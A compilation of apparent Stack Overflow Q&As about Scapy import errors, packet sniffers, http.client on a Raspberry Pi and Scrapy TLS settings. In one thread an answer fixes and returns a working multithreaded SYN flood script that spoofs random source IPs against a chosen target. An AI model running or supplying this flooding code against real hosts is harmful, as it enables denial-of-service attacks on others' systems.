vscode said can't find IP in scapy.all
but from terminal, i can import it:
could somebody tell my why?
I get exactly the same issue with my Scapy code in VS Code. I think it's to do with the way pylint is working.
When you from scapy.all import IP, Python loads scapy/all.py, which includes the line from scapy.layers.all import *. scapy/layers/all.py includes this code:
for _l in conf.load_layers:
log_loading.debug("Loading layer %s" % _l)
try:
load_layer(_l, globals_dict=globals(), symb_list=__all__)
except Exception as e:
log.warning("can't import layer %s: %s", _l, e)
conf.load_layers is over in scapy/config.py:
load_layers = ['bluetooth', 'bluetooth4LE', 'dhcp', 'dhcp6', 'dns',
'dot11', 'dot15d4', 'eap', 'gprs', 'hsrp', 'inet',
'inet6', 'ipsec', 'ir', 'isakmp', 'l2', 'l2tp',
'llmnr', 'lltd', 'mgcp', 'mobileip', 'netbios',
'netflow', 'ntp', 'ppp', 'pptp', 'radius', 'rip',
'rtp', 'sctp', 'sixlowpan', 'skinny', 'smb', 'snmp',
'tftp', 'vrrp', 'vxlan', 'x509', 'zigbee']
I suspect that pylint doesn't follow those imports correctly.
I've tried the workarounds suggested in the relevant GitHub issue, but they don't seem to fix anything for Scapy. Pylint eventually added specific workarounds for the issues in Numpy - and no-one has done that for Scapy.
You can work around these issues by directly importing the IP class from the relevant layer at the top of your Python file:
from scapy.layers.inet import IP, UDP, TCP, ICMP
Et voila! No more pylint complaints about those imports.
Related
This is my first posting, so please forgive any lack of decorum
I am building a SeeingWand as outlined in MagPi issue #71.
I have installed and tested all the HW. Then install the python code, the original; code was python2.7, I have update the code to run under python3, but get a strange error when i run the code:
The system displays that the http module does not have a .client attribute.
The documentation says it does. I have tried .client and .server attributes both give the same error. What am i doing wrong?
I have tried several coding variations and several builds of the raspberry OS (Raspbian) mostly give the same errors
import picamera, http, urllib, base64, json, re
from os import system
from gpiozero import Button
CHANGE {MS_API_KEY} BELOW WITH YOUR MICROSOFT VISION API KEY
ms_api_key = "{MS_API_KEY}"
camera button - this is the BCM number, not the pin number
camera_button = Button(27)
setup camera
camera = picamera.PiCamera()
setup vision API
headers = {
'Content-Type': 'application/octet-stream',
'Ocp-Apim-Subscription-Key': ms_api_key,
}
params = urllib.parse.urlencode({
'visualFeatures': 'Description',
})
loop forever waiting for button press
while True:
camera_button.wait_for_press()
camera.capture('/tmp/image.jpg')
body = open('/tmp/image.jpg', "rb").read()
try:
conn = http.client.HTTPsConnection('westcentralus.api.cognitive.microsoft.com')
conn.request("POST", "/vision/v1.0/analyze?%s"%params, body, headers)
response = conn.getresponse()
analysis=json.loads(response.read())
image_caption = analysis["description"]["captions"][0]["text"].capitalize()
# validate text before system() call; use subprocess in next version
if re.match("^[a-zA-z ]+$", image_caption):
system('espeak -ven+f3 -k5 -s120 "' + image_caption + '"')
else :
system('espeak -ven+f3 -k5 -s120 "i do not know what i just saw"')
conn.close()
except Exception as e:
print (e.args)
The system displays an error stating that the http module does not have a .client attribute.
The documentation says it does. I have tried .client and .server attributes both give the same error. What am i doing wrong?
Expected results are:
when i push button 1 I expect the camera to take a picture
when i push button 2 i expect to access MSFT Azure to identify the picture using AI
the final output is for the Wand to access the audio hat and describe what the Wand is "looking" at.
try adding an import like this:
import http.client
Edit: http is a Python package. Even if the package contains some modules, it does not automatically import those modules when you import the package, unless the __init__.py for that package does so on your behalf. In the case of http, the __init__.py is empty, so you get nothing gratis just for importing the package.
I have write code for sniffing packet using scapy in python. And i got some problems that make me confused, showed by this picture below.
enter image description here -> Important
so this is the code
import subprocess
import time
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
logging.getLogger("scapy.loading").setLevel(logging.ERROR)
logging.getLogger("scapy.interactive").setLevel(logging.ERROR)
try:
from scapy.all import *
except ImportError:
sys.exit()
interface = 'wlp10s0'
subprocess.call(["ifconfig",interface,"promisc"],stdout=None,stderr=None,shell=False)
print 'Interface has been set to Promiscous mode'
totalpackets=0
sniffingtime=10
protocols=0
infinite=1
def timenow():
currenttime=time.strftime("%m%d%y-%H%M%S")
return currenttime
def export():
p = sniff(iface='wlp10s0',timeout=sniffingtime,count=0)
wrpcap('./home/Desktop/' + timenow() + '.pcap',p);
while infinite==1 :
export()
I hope someone can helping me solve this code.
Thank you.
./home/... is an I valid path. Use /home/... instead.
It clearly says “OSerror: No such file or directory”. You may want to lookup those errors ;-)
I am working on building a packet sniffing program using Python, however I have hit a speed bump. For some reason I think socket has not imported properly, because I am getting the following message when my program is run: AttributeError: module 'socket' has no attribute 'AF_PACKET'
I am using OS X and Pycharm is my IDE and I am running the latest version of Python if that helps.
Anyways here is my complete program so far:
import struct
import textwrap
import socket
def main():
connection = socket.socket(socket.AF_PACKET, socket.SOCKET_RAW, socket.ntohs(3))
while True:
rawData, address = connection.recvfrom(65535)
reciever_mac, sender_mac, ethernetProtocol, data = ethernet_frame(rawData)
print('\nEthernet Frame: ')
print('Destination: {}, Source: {}, Protocol: {}'.format(reciever_mac, sender_mac, ethernetProtocol))
# Unpack ethernet frame
def ethernet_frame(data):
reciever_mac, sender_mac, protocol = struct.unpack('! 6s 6s H', data[:14])
return getMacAddress(reciever_mac), getMacAddress(sender_mac), socket.htons(socket), data[14:]
# Convert the Mac address from the jumbled up form from above into human readable format
def getMacAddress(bytesAddress):
bytesString = map('{:02x}'.format, bytesAddress)
macAddress = ':'.join(bytesString).upper()
return macAddress
main()
Thanks for any help in advance!
Actually, AF_PACKET doesn't work on OS X, it works on Linux.
AF_PACKET equivalent under Mac OS X (Darwin)
I ran into this issue on macOS 10.13.1, using Python 3.6.3 and this cool scapy fork that is compatible with python3.
I was using version 0.22 of that tool and as suggested in this issue downgrading to version 0.21 fixed this issue!
In case scapy is not a viable alternative, you could also try the pcap library as suggested in this post (although using python 2 seems to be necessary here).
I'm writing a script in Python which use Scapy but my problem is that the exception is:
i = IP()
NameError: global name 'IP' is not defined
This is my script:
import random
from scapy import *
import threading
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
print ("Which IP would you like to choose?")
ip = raw_input("-->")
print ("Which Port would you like to choose?")
port = raw_input("-->")
class sendSYN(threading.Thread):
global ip, port
def __init__(self):
threading.Thread.__init__(self)
def run(self):
# Method -
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = ip
t = TCP()
t.sport = random.randint(1, 65535)
t.dport = port
t.flags = 'S'
send(i/t, verbose=0)
count = 0
while True:
if threading.activeCount() < 200:
sendSYN().start()
count += 1
if count % 100 == 0:
print ("\rPackets SYN\t:\t\t\t%i" % count)
What should I do to fix it?
import IP/TCP
You can import all the layers scapy provides directly from the scapy.layers.* subpackage. This is fine as long as you do not require any other functionality like send/sendp/sniff/... or you require some pretty magical layers like ASN.1 that fail and raise an exception if some global initialization that is usually set with importing scapy.all is missing.
The specific import for IP() and TCP() (check your scapy/layers/inet.py)
from scapy.layers.inet import IP, TCP
would be enough as long as you'd only use them for de-/serialization (e.g. assembling/disassembling packets) but since you also require send() you have to import scapy.all like Semih Yagcioglu suggested.
Please note that according to the scapy manual the import line changed from from scapy import * (scapy v1.x) to from scapy.all import * (since scapy v2.x) therefore the following should be fine for you:
from scapy.all import send, IP, TCP
Notice that importing scapy.all is pretty slow as it wildcard imports all the subpackages and does some initialization magic.
That said, you should try to avoid unnecessary wildcard imports (coding style; even though there is not much difference in case of scapy)
from scapy.all import *
python 2.7
scapy v2.3.1 is compatible with python 2.7 on linux.
However it is not that trivial to have it fully functional on windows, see problems with scapy on windows, especially with sending packets over phys wifi nics. Typically windows people run python2.6 with scapy 2.3.1 (note that there might be permission issues when scapy tries to get raw socket access on certain windows versions). To spare you some headaches I strongly recommend to run it on linux (vbox is fine).
working example of your code
The following code is working fine for me on linux, py2.7 scapy 2.3.1:
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import threading
import random
from scapy.all import IP, TCP, RandIP, send, conf, get_if_list
logging.basicConfig(level=logging.DEBUG, format='%(asctime)-15s [%(threadName)s] %(message)s')
class sendSYN(threading.Thread):
def __init__(self, target):
threading.Thread.__init__(self)
self.ip, self.port = target
def run(self):
pkt = IP(src=RandIP(),
dst=self.ip)/TCP(flags='S',
dport=self.port,
sport=random.randint(0,65535))
send(pkt)
logging.debug("sent: %s"%pkt.sprintf("{IP:%IP.src%:%TCP.sport% -> %IP.dst%:%TCP.dport%}"))
if __name__=='__main__':
conf.verb = 0 # suppress output
print ("Which Interface would you like to choose? %r"%get_if_list())
iface = raw_input("[%s] --> "%get_if_list()[0]) or get_if_list()[0]
if iface not in get_if_list(): raise Exception("Interface %r not available"%iface)
conf.iface = iface
print ("Which IP would you like to choose?")
ip = raw_input("-->")
print ("Which Port would you like to choose?")
port = int(raw_input("-->"))
count = 0
while True:
if threading.activeCount() < 200:
sendSYN((ip, port)).start()
count += 1
if count % 100 == 0:
logging.info ("\rPackets SYN\t:\t\t\t%i" % count)
fixed import
uses logging instead of print
passes target to class instance instead of using globals
added interface selection (must have for windows as scapy uses linux style interface names for both linux and windows which is why you may have to guess the correct one for windows)
globally sets scapy verbosity
uses RandIP() Field instead of manually building a random IP
TCP.sport/dport expects an integer therefore you have to parseInt the value read from stdin.
prints sent packets IP/port using snprintf()
I think you should make the necessary imports for what seems to be missing.
Try this:
from scapy.all import IP
Or this:
from scapy.all import *
It looks like you are using python3 by your "print()" but when you wanted to get an input from the user you used "raw_input" instead of "input"
I've to crawl https://dms.psc.sc.gov/Web/dockets which uses TLS v1.2 using scrapy framework. But in requesting the URL it fails to load and raise [<twisted.python.failure.Failure <class 'OpenSSL.SSL.Error'>>].
There is issue discussed on git https://github.com/scrapy/scrapy/issues/981 but it did not work for me. I have scrapy v 0.24.5 and twisted version >=14.
When I try to crawl another site which also uses TLS v1.2 it works but not for the https://dms.psc.sc.gov.
How to solve this issue?
PR fixing this problem in Scrapy was already merged. Recently (in February 2016) there was another pull request fixing similar bug
I see with most recent Scrapy version I can fetch your page all right, but with older versions problem still appears.
In general, if you stumble on HTTP-s problem with Scrapy the solution is:
upgrade Scrapy to newest version
check what version of Twisted you use, if it's not most recent update to most recent Twisted version (as of time of writing versions above 14 are confirmed to be significantly better when it comes to SSL)
If you still experience problems after updating Scrapy and Twisted you may need to subclass ScrapyClientContextFactory - see answer below for details.
More details in this github issue
1.addDOWNLOADER_CLIENTCONTEXTFACTORY='testproject.CustomContext.CustomClientContextFactory'
to your settings.py
2.create file called CustomContext.py in your project directory
and add the below code
from OpenSSL import SSL
from twisted.internet.ssl import ClientContextFactory
from twisted.internet._sslverify import ClientTLSOptions
from scrapy.core.downloader.contextfactory import ScrapyClientContextFactory
class CustomClientContextFactory(ScrapyClientContextFactory):
def getContext(self, hostname=None, port=None):
ctx = ClientContextFactory.getContext(self)
# Enable all workarounds to SSL bugs as documented by
# http://www.openssl.org/docs/ssl/SSL_CTX_set_options.html
ctx.set_options(SSL.OP_ALL)
if hostname:
ClientTLSOptions(hostname, ctx)
return ctx
Note: It worked well for crawling with https sites in windows but when I tried the same in Ubuntu 14.04 it throws error as below :-
from twisted.internet._sslverify import ClientTLSOptions
exceptions.ImportError: cannot import name ClientTLSOptions
It would be great if anyone adds solution for the above error.
EDIT:
instead of using from twisted.internet._sslverify import ClientTLSOptions
I have changed it to the below
try:
# available since twisted 14.0
from twisted.internet._sslverify import ClientTLSOptions
except ImportError:
ClientTLSOptions = None
Anyone having "TypeError: unbound method getContext() must be called with ClientContextFactory instance as first argument ..."
Replace ctx = ClientContextFactory.getContext(self)
with ctx = ScrapyClientContextFactory.getContext(self)
Vinodh Velumayil' answer is right. But I had to edit this string:
ctx = ClientContextFactory.getContext(self)
to this:
inst = ClientContextFactory()
ctx = inst.getContext()